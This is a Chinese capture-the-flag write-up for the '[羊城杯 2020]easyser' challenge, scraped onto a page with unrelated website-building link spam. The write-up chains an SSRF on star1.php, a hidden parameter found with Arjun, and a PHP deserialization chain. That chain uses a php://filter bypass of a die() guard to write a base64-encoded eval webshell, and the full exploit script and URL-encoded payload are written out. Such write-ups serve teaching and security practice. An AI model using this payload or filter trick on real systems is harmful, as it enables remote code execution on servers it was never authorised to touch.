当前位置: 首页 > news >正文

广州 骏域网站建设 陶瓷做一个个人网站的步骤

广州 骏域网站建设 陶瓷,做一个个人网站的步骤,wordpress橙色主题,购物网站开店免费NSS [羊城杯 2020]easyser 开题。很容易让人觉得环境坏了。 不要慌,无从下手时。看源码、扫目录、抓包。一套操作下来,发现几个可以下手的路由。 /index.php /robots.txt 访问 /star1.php,一说到百度,就猜测是否存在SSRF。 源码中…

NSS [羊城杯 2020]easyser

开题。很容易让人觉得环境坏了。

image-20230830210018338

不要慌·,无从下手时。看源码、扫目录、抓包。一套操作下来,发现几个可以下手的路由。

image-20230830210319606

/index.php

image-20230830210448344

/robots.txt

image-20230830210429957

访问 /star1.php,一说到百度,就猜测是否存在SSRF。

image-20230830210522532

源码中有提示,更加确定是SSRF了。

image-20230830210800417

SSRF进内网读取ser.php,成功读取。

http://127.0.0.1/ser.php

image-20230830211101565

好家伙,有源码没有反序列化入口????

没关系,我们可以用一个工具arjun

kali上安装:
pip3.8 install arjun使用:
arjun -u URL详细使用方法:
https://github.com/s0md3v/Arjun/wiki/Usage

Arjun 来扫描 http参数。 star1.php 页面除了 path 参数,还有一个 c 参数。Arjun显示发现c的原理是根据响应的body的长度,后续通过分析代码发现,不设置参数c会显示your hat is too black!,存在参数c就不会显示任何内容,所以的确是可以根据响应长度来发现参数。c 就是反序列化的入口。但是不知道他是如何反序列化的。

桌面root终端直接用就行了

arjun -u http://node4.anna.nssctf.cn:28617/star1.php?path=http://127.0.0.1/ser.php

不知道为什么2.2.1版本的没跑出来,用一下别的师傅的图。

img


即使不知道他是怎么反序列化的,我们依然能做。分析源码,我们的重点肯定是Yongen::hasaki(),在这个方法里面绕过死亡die同时写马到文件。死亡die用rot13或者base64都能绕过。通过base64解密或rot13解密使<?php die("nononon");?>变为乱码,而传入的$text为base64编码,解码后为正常shell语句。通过这种方式使前者失效。

链子如下:

GWHT::__construct()->GWHT::__toString()->Yongen::hasaki()

exp:(用string.strip_tags<?php?>全部删掉再base64解码)

<?phpclass GWHT{public $hero;
}
class Yongen{ //flag.phppublic $file;public $text;
}$a=new GWHT;
$a->hero=new Yongen;
$a->hero->file='php://filter/write=string.strip_tags|convert.base64-decode/resource=1.php';
$a->hero->text='PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+';echo urlencode(serialize($a));

payload:

/star1.php?path=http://127.0.0.1/ser.php&c=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A73%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3D1.php%22%3Bs%3A4%3A%22text%22%3Bs%3A32%3A%22PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%22%3B%7D%7D

访问1.php,getshell。

image-20230830220206533

http://www.yayakq.cn/news/11969/

相关文章:

  • 网站建设行业知乎编程培训机构排名
  • 广州英文网站制作宁波拳头信息科技有限公司
  • 域名注册以后会给你一个账户名密码上传做好的网站外贸网站建设产品
  • 东台做网站找哪家好大港网站开发
  • 网站二级目录建站wordpress php推送示例
  • 企业网站建设包括哪些做淘宝客网站需要什么要求吗
  • 网站做哪种推广好番禺人才招聘网
  • 郑州网站建设规划如何用模板搭建网站
  • 技术支持 骏域网站建设专家佛山手机界面app界面设计分析
  • 博客类网站源码网站建设中 请稍后访问
  • 云南微网站制作北京建设专职查询网站
  • 做网站用lunx百度推广登录入口下载
  • vps 网站上传手机网站制作相关文章
  • 绍兴建设网站制作邢台做网站的
  • 怎么免费制作网站平台怎么让学生在网站上做问卷调查
  • 安卓aso优化工具aso优化技巧
  • 视频付费点播网站怎么做wordpress禁止采集
  • 企业网站建设发展历程科技企业网站
  • 免费建站微信最好用的磁力搜索器
  • 珠海哪个建设网站建设好网站开发的比较
  • 唐山网站建设方案策划卡二卡三卡四精品
  • 国内做网上旅游业务的网站网站首页跳出弹窗
  • 类似凡科互动的网站购物网站设计公司
  • wordpress多域名多站点淘宝官网首页电脑版
  • 福建自己建设网站网站每年都要备案吗
  • 男女做暧暧试看网站49手机端网站外部链接如何去优化
  • 全网推广网站青岛网站平台开发
  • 乐平市网站建设湖北交投建设集团有限公司网站
  • 网站漏洞扫描工具四川建设厅网站怎么进不去
  • 青岛响应式网站开发php网站忘记后台密码